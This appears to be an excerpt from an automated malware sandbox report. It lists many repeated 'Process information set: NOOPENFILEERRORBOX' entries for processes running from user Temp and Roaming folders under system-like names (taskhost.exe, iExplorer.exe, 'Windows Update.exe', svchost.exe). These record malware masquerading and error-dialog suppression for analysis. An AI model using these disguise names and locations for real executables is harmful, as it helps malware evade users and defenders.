                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
